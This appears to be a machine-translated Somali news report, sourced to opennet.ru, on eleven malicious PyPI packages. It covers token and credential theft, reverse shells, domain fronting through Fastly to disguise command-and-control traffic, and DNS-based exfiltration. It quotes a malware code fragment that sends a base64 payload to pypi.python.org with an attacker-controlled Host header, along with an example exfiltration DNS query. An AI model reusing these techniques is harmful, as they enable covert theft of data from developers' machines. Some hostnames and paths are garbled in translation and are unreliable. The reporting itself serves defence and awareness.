Hagaha PyPI (Python Package Index), 11 baakadood oo ay ku jiraan kood xaasidnimo ah ayaa la aqoonsaday. Ka hor inta aan dhibaatooyinka la aqoonsan, xirmooyinka ayaa la soo dejiyay ilaa 38 kun jeer wadar ahaan. Xirmooyinka xaasidnimada leh ee la ogaaday ayaa caan ku ah adeegsiga hababka casriga ah si ay ugu qariyaan marinnada isgaarsiinta ee adeegayaasha weeraryahannada.
- Baakadaha muhimka ah (6305 downloads), xirmo muhiim ah (12897) - xiriir la sameeyay server dibadda ah oo hoos yimaada isku xirka pypi.python.org si loo bixiyo marinka qolofka ee nidaamka kanaalka isgaarsiinta.
- pptest (10001), ipboards (946) - loo isticmaalo DNS sida kanaalka isgaarsiinta si loogu gudbiyo macluumaadka ku saabsan nidaamka (baakadda ugu horeysa magaca martida loo yahay, tusaha shaqada, gudaha iyo dibadda IP, kan labaad - magaca isticmaalaha iyo magaca martida) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - waxay aqoonsadeen calaamada adeegga Discord ee nidaamka waxayna u direen martigeliyaha dibadda.
- trrfab (287) - waxay u dirtay aqoonsiga, magaca martida loo yahay iyo waxa ku jira /etc/passwd, /etc/hosts, /guriga martida dibadda ah.
- 10Cent10 (490) - aasaasay isku xirka qolofka gadaale ee martida dibadda.
- yandex-yt (4183) - soo bandhigay fariin ku saabsan nidaamka la jabiyay oo loo wareejiyay bog leh macluumaad dheeraad ah oo ku saabsan talaabooyinka dheeraadka ah ee lagu soo saaray nda.ya.ru (api.ya.cc).
Xusuus gaar ah ayaa ah habka loo galo martigeliyaha dibadda ee loo isticmaalo xirmooyinka muhiimka ah iyo xirmooyinka xirmooyinka muhiimka ah, kuwaas oo adeegsadey shabakada gudbinta nuxurka degdega ah ee loo isticmaalo tusaha PyPI si ay u qariyaan waxqabadkooda. Dhab ahaantii, codsiyada waxaa loo diray server-ka pypi.python.org (oo ay ku jirto qeexida magaca python.org ee SNI gudaha codsiga HTTPS), laakiin HTTP "Host" madaxa waxaa ku jira magaca server-ka ay gacanta ku hayaan weeraryahanadu (s. hore.io. caalami ah.prod.dhakhso.net). Shabakadda gudbinta nuxurku waxay codsi la mid ah u dirtay server-ka weerarka, iyadoo la adeegsanayo cabbirrada xidhiidhka TLS ee pypi.python.org marka xogta la gudbinayo.
Kaabayaasha PyPI waxaa ku shaqeeya shabakada gudbinta nuxurka degdega ah, taas oo adeegsata wakiilka hufan ee Varnish si ay u kaydiso codsiyada caadiga ah, sidoo kale waxay isticmaashaa habka shahaadada TLS ee heerka CDN, halkii ay ka ahaan lahayd adeegayaasha dhamaadka, si ay ugu gudbiso codsiyada HTTPS iyada oo loo marayo wakiil. Iyadoo aan loo eegin martigeliyaha bartilmaameedka ah, codsiyada waxaa loo diraa wakiilka, kaas oo go'aaminaya martigeliyaha la doonayo iyada oo la adeegsanayo HTTP "Host" madaxa, iyo magacyada domainka martigeliyaha waxay ku xiran yihiin CDN culeyska culeyska IP-ga ee caadiga ah ee dhammaan macaamiisha Fastly.
Adeegga weeraryahannada ayaa sidoo kale ka diiwaan gashan CDN Fastly, kaas oo siinaya qorshooyin bilaash ah qof walba oo xitaa ogolaanaya diiwaangelinta qarsoodiga ah. Waxaa xusid mudan in codsiyada loo diro dhibbanaha marka la abuurayo "Qofka gadaale", qorshe ayaa sidoo kale la isticmaalaa, laakiin laga bilaabo dhinaca martida loo yahay weerarka. Xagga dibadda, is dhexgalka server-ka weeraryahannada ayaa u eg fadhi sharci ah oo leh hagaha PyPI, oo sir ah iyadoo la adeegsanayo shahaadada PyPI TLS. Farsamo la mid ah, oo loo yaqaan "domain fronting," ayaa horay si firfircoon loo isticmaalay si loo qariyo magaca martida loo yahay marka laga gudbo xannibaadda, iyadoo la adeegsanayo awoodda lagu bixiyo qaar ka mid ah shabakadaha CDN si ay u galaan HTTPS iyagoo muujinaya martigeliyaha khiyaaliga ah ee SNI oo dhab ahaantii gudbinaya magaca martigeliyaha la codsaday madax HTTP Host gudaha fadhiga TLS.
Si loo qariyo nashaadaadka xunxun, xidhmada TrevorC2 waxa kale oo loo isticmaalay in lagu sameeyo is dhexgalka serferka oo la mid ah navigation webka caadiga ah, tusaale ahaan, codsiyo xaasidnimo ah ayaa la soo diray iyada oo hoos imanaysa soo dejinta sawirka "https://pypi.python.org/images/ guid=β oo wata xogta ku deddejinaysa cabbirka hagaha. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = codsi. Codsi(url, headers = {'Host': "psc.forward.io.global.prod.fastly.net")
Xirmooyinka pptest iyo ipboards waxay adeegsadeen hab ka duwan si ay u qariyaan dhaqdhaqaaqa shabakada, iyadoo lagu saleynayo codaynta macluumaadka waxtarka leh ee su'aalaha server-ka DNS. Malware-ku wuxuu gudbiyaa macluumaadka isagoo fulinaya codsiyada DNS sida "nu4timjagq4fimbuhe.example.com", kaas oo xogta loo gudbiyo server-ka kantaroolka lagu dhejiyay iyadoo la adeegsanayo qaabka base64 ee magaca subdomain. Weeraryahanku wuxuu helayaa fariimahan isagoo xakameynaya server-ka DNS ee domainka example.com.
Source: opennet.ru